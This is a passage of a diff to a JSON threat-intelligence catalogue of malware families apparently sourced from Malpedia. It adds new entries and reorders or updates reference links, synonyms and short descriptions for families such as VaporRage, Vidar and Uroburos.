+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/APT29_C2-Client_Dropbox_Loader/APT29-DropboxLoader_analysis.md"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "541a0a05-5c7f-4646-a96b-a4d26d5fa89d",
+ "value": "Unidentified 099 (APT29 Dropbox Loader)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_100",
+ "https://mp.weixin.qq.com/s/Hzq4_tWmunDpKfHTlZNM-A"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0ee92ce5-e33d-4393-a466-6b5f6a1ca6a5",
+ "value": "Unidentified 100 (APT-Q-12)"
+ },
+ {
+ "description": "Potential Lazarus sample.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101",
+ "https://twitter.com/RedDrip7/status/1595365451495706624"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cca4f240-ac69-437e-b02a-5483ebef5087",
+ "value": "Unidentified 101 (Lazarus?)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102",
+ "https://labs.k7computing.com/index.php/the-donot-apt/",
+ "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6d22d9e1-b38d-4a6f-a4bb-1121ced4adfc",
+ "value": "Unidentified 102 (Donot)"
+ },
+ {
+ "description": "A malware that uses .NET to load unmanaged (shell)code which has some resemblance to BADHATCH, the IP found in the sample was referred to in coverage on WHITERABBIT ransomware attacks.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103",
+ "https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "07106811-cd07-4d05-906d-c05208758b00",
+ "value": "Unidentified 103 (FIN8)"
+ },
{
"description": "",
"meta": {
@@ -46559,8 +49154,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upas",
- "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html",
- "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/"
+ "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/",
+ "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html"
],
"synonyms": [
"Rombrast"
@@ -46575,23 +49170,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre",
+ "https://secrary.com/ReversingMalware/Upatre/",
"https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/",
"https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/",
"https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
- "https://secrary.com/ReversingMalware/Upatre/"
+ "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "99d9110d-85a4-4819-9f85-05e4b73aa5f3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0",
"value": "Upatre"
},
@@ -46612,20 +49199,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
- "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
- "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
- "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
- "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/",
- "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
- "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
- "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/",
+ "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/",
- "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
+ "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
+ "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
+ "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
"https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much"
+ "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA",
+ "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features"
],
"synonyms": [
"Bebloh",
@@ -46641,21 +49228,23 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos",
- "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation",
- "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
- "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
- "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
- "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg",
- "https://artemonsecurity.com/uroburos.pdf",
+ "https://artemonsecurity.com/snake_whitepaper.pdf",
+ "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/",
+ "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
"https://www.secureworks.com/research/threat-profiles/iron-hunter",
"https://www.circl.lu/pub/tr-25/",
- "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf",
- "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://exatrack.com/public/Uroburos_EN.pdf",
"https://securelist.com/analysis/publications/65545/the-epic-turla-operation/",
- "https://exatrack.com/public/Uroburos_EN.pdf"
+ "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/",
+ "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
+ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a",
+ "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence",
+ "https://artemonsecurity.com/uroburos.pdf",
+ "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation",
+ "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots"
],
"synonyms": [
"Snake"
@@ -46670,9 +49259,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit",
- "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view",
"https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://securelist.com/cycldek-bridging-the-air-gap/97157/"
+ "https://securelist.com/cycldek-bridging-the-air-gap/97157/",
+ "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view"
],
"synonyms": [],
"type": []
@@ -46685,9 +49274,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry",
- "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/",
"https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/"
+ "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf"
],
"synonyms": [],
"type": []
@@ -46700,8 +49289,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
- "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/"
+ "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
],
"synonyms": [],
"type": []
@@ -46727,9 +49316,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
"https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
],
"synonyms": [],
"type": []
@@ -46750,13 +49339,30 @@
"uuid": "5bb80b4a-d304-460a-bb07-417dea64f213",
"value": "vanillarat"
},
+ {
+ "description": "According to Mandiant, VaporRage or BOOMMIC, is a shellcode downloader written in C that communicates over HTTPS. Shellcode Payloads are retrieved from a hardcoded C2 that uses an encoded host_id generated from the targets domain and account name. BOOMMIC XOR decodes the downloaded shellcode payload in memory and executes it.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
+ ],
+ "synonyms": [
+ "BOOMMIC"
+ ],
+ "type": []
+ },
+ "uuid": "5a76d7a1-486e-4f4e-9e23-e544ee9f2ef9",
+ "value": "VaporRage"
+ },
{
"description": "In May 2019, ESET researchers observed a spike in ESET telemetry data regarding malware targeting France. After further investigations, they identified malware that distributes various types of spam. One of them is leading to a survey that redirects to a dodgy smartphone promotion while the other is a sextortion campaign. The spam targets the users of Orange S.A., a French ISP.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky",
- "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
- "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/"
+ "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/",
+ "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/"
],
"synonyms": [],
"type": []
@@ -46769,17 +49375,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
"https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
+ "https://medium.com/@Ilandu/vawtrak-malware-824818c1837",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
+ "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
+ "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://www.secureworks.com/research/dyre-banking-trojan",
"https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf",
"https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
- "https://www.secureworks.com/research/dyre-banking-trojan",
"https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/"
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
],
"synonyms": [
"Catch",
@@ -46788,15 +49395,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "e95dd1ba-7485-4c02-bf2e-14beedbcf053",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b662c253-5c87-4ae6-a30e-541db0845f67",
"value": "Vawtrak"
},
@@ -46807,7 +49405,9 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.veeam",
"https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger"
],
- "synonyms": [],
+ "synonyms": [
+ "Eamfo"
+ ],
"type": []
},
"uuid": "f85bbceb-dc51-4c11-93a6-21a72255dcaf",
@@ -46818,11 +49418,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker",
- "https://twitter.com/malwrhunterteam/status/1093136163836174339",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
"https://twitter.com/malwrhunterteam/status/1095024267459284992",
"https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/"
+ "https://twitter.com/malwrhunterteam/status/1093136163836174339",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/",
+ "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
],
"synonyms": [
"Buran",
@@ -46846,14 +49446,27 @@
"uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f",
"value": "Velso"
},
+ {
+ "description": "Ransomware, which appears to be a rebranding of win.cuba.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vendetta",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2023/03/ransomware-review-march-2023"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "bd774e26-f558-444b-abe6-c75868374d5e",
+ "value": "Vendetta"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.venom",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
"https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/",
- "https://blog.malwarelab.pl/posts/venom/"
+ "https://blog.malwarelab.pl/posts/venom/",
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html"
],
"synonyms": [],
"type": []
@@ -46867,6 +49480,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk",
"https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
"https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [],
@@ -46906,9 +49522,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
"https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html"
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
],
"synonyms": [],
"type": []
@@ -46917,7 +49533,7 @@
"value": "Vermin"
},
{
- "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.",
+ "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protected by VMProtect.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder",
@@ -46934,12 +49550,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/",
"https://twitter.com/GrujaRS/status/1241657443282825217",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html"
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html",
+ "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -46952,9 +49568,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/",
"https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/",
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
"https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/"
],
"synonyms": [],
@@ -46968,40 +49584,59 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar",
- "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
- "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
- "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
- "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://asec.ahnlab.com/en/30445/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://eln0ty.github.io/malware%20analysis/vidar/",
- "https://intel471.com/blog/privateloader-malware",
"https://isc.sans.edu/diary/rss/28468",
- "https://asec.ahnlab.com/en/22932/",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
- "https://cert.pl/en/posts/2021/10/vidar-campaign/",
- "https://threatpost.com/microsoft-help-files-vidar-malware/179078/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
- "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
- "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
- "https://asec.ahnlab.com/en/30875/",
- "https://twitter.com/sisoma2/status/1409816282065743872",
- "https://asec.ahnlab.com/ko/25837/",
"https://ke-la.com/information-stealers-a-new-landscape/",
- "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/"
+ "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
+ "https://blog.jaalma.io/vidar-infostealer-analysis/",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/",
+ "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://eln0ty.github.io/malware%20analysis/vidar/",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign",
+ "https://asec.ahnlab.com/en/22932/",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
+ "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/",
+ "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
+ "https://asec.ahnlab.com/en/30875/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://twitter.com/sisoma2/status/1409816282065743872",
+ "https://cert.pl/en/posts/2021/10/vidar-campaign/",
+ "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
+ "https://www.youtube.com/watch?v=lxdlNOaHJQA",
+ "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
+ "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
+ "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
+ "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google",
+ "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://www.kroll.com/en/insights/publications/cyber/threat-actors-google-ads-deploy-vidar-stealer",
+ "https://threatpost.com/microsoft-help-files-vidar-malware/179078/"
],
"synonyms": [],
"type": []
@@ -47014,11 +49649,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.vigilant_cleaner",
- "https://blog.trendmicro.co.jp/archives/28319",
- "https://www.mbsd.jp/research/20210721/blog/",
"https://blog.cyble.com/2021/08/02/a-deep-dive-analysis-of-a-new-wiper-malware-disguised-as-tokyo-olympics-document/",
+ "https://blog.trendmicro.co.jp/archives/28319",
"https://www.fortinet.com/blog/threat-research/wiper-malware-riding-tokyo-olympic-games",
- "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/"
+ "https://therecord.media/wiper-malware-targeting-japanese-pcs-discovered-ahead-of-tokyo-olympics-opening/",
+ "https://www.mbsd.jp/research/20210721/blog/"
],
"synonyms": [
"VIGILANT CHECKER"
@@ -47041,18 +49676,48 @@
"uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4",
"value": "virdetdoor"
},
+ {
+ "description": "Polymorphic parasitic file infecting virus which transforms files into copies of itself. Additionally it uses screen-locking as a ransomware technique.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virlock",
+ "https://www.ciberseguridad.eus/sites/default/files/2022-04/bcsc-malware-virlock-tlpwhite_v1242.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-january-14-29-2017",
